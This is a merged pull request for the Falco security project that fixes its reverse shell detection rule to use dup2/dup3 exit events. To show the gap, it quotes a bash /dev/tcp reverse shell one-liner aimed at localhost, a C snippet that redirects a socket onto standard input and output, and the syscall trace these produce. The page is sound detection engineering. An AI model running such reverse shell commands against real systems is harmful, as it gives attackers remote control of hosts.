
fix(rules): use exit event in reverse shell detection rule #2076

Merged
merged 2 commits into from Jun 23, 2022

Conversation

alacuku
Member

@alacuku alacuku commented Jun 20, 2022

Signed-off-by: Aldo Lacuku <aldo@lacuku.eu>

What type of PR is this?

Uncomment one (or more) /kind <> lines:

/kind bug

/kind cleanup

/kind design

/kind documentation

/kind failing-test

/kind feature

If contributing rules or changes to rules, please make sure to also uncomment one of the following lines:

/kind rule-update

/kind rule-create

Any specific area of the project related to this PR?

Uncomment one (or more) /area <> lines:

/area build

/area engine

/area rules

/area tests

/area proposals

What this PR does / why we need it:
This PR updates the reverse shell detection rule so that it is triggered when dup2 or dup3 is called. Before falcosecurity/libs#385, the dup2 and dup3 events were sent to userspace as dup events.

Which issue(s) this PR fixes:

In some cases the rule is not triggered when a reverse shell is spawned. That's because in the rule we are checking that the file descriptor passed to the dup functions is of type socket and its fd number is 0, 1 or 2 and the event direction is enter. The following code snippet is not detected as a reverse shell:

    connect(socket_fd, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr_in));
    dup2(socket_fd, STDIN_FILENO);
    dup2(socket_fd, STDOUT_FILENO);
    dup2(socket_fd, STDERR_FILENO);

That's obvious since we are not passing a file descriptor to the dup2 syscall that satisfies the conditions required by the rule.

On the other hand, a command like this one: /bin/bash -i >& /dev/tcp/127.0.0.1/9999 0>&1 (#1152) triggers the rule.
Digging a little bit deeper, we see that the following syscalls are involved:

23889 socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
23889 connect(3, {sa_family=AF_INET, sin_port=htons(9999), sin_addr=inet_addr("127.0.0.1")}, 16) = 0
23889 dup2(3, 1)                        = 1
23889 close(3)                          = 0
23889 dup2(1, 2)                        = 2
23889 dup2(1, 0)                        = 0
23889 fcntl(1, F_GETFD)                 = 0
23889 execve("/usr/bin/bash", ["bash", "-i"], 0x56212e810be0 /* 21 vars */) = 0
23889 brk(NULL)                         = 0x5571dcec9000

The first dup2(3,1) is not detected by the rule but the subsequent calls are.

The right way to detect such scenarios is to check the returned file descriptor in the exit events. In order to avoid dealing explicitly with the event direction, we use the field evt.rawres in (0, 1, 2), which is present in the exit events.

Fixes #

Special notes for your reviewer:

As @leogr noted here, this PR needs to be merged after we bump Falco with a new driver version.

Does this PR introduce a user-facing change?:

fix(rules): use exit event in reverse shell detection rule

In some cases the rule is not triggered when a reverse shell is spawned.
That's because in the rule we are checking that the file descriptor passed
as argument to the dup functions is of type socket and its fd number is "0, 1, or 2"
and the event direction is "enter".
The following event does not trigger the rule: dup2(socket_fd, STDIN_FILENO);
But using the exit event the rule is triggered.

Signed-off-by: Aldo Lacuku <aldo@lacuku.eu>
Signed-off-by: Aldo Lacuku <aldo@lacuku.eu>
@jasondellaluce
Contributor

/milestone 0.32.1

@poiana poiana added this to the 0.32.1 milestone Jun 21, 2022
@loresuso
Member

This is great! Thank you @alacuku!

@Kaizhe
Contributor

Kaizhe commented Jun 23, 2022

Good job!

@poiana

poiana commented Jun 23, 2022

LGTM label has been added.

Git tree hash: f79d288ba3da56976248773b2cf06938982fc24a

Contributor

@jasondellaluce jasondellaluce left a comment


/approve

@poiana

poiana commented Jun 23, 2022

[APPROVALNOTIFIER] This PR is APPROVED

This pull-request has been approved by: alacuku, jasondellaluce

The full list of commands accepted by this bot can be found here.

The pull request process is described here

Needs approval from an approver in each of these files:

Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment

@poiana poiana merged commit d904213 into falcosecurity:master Jun 23, 2022
5 participants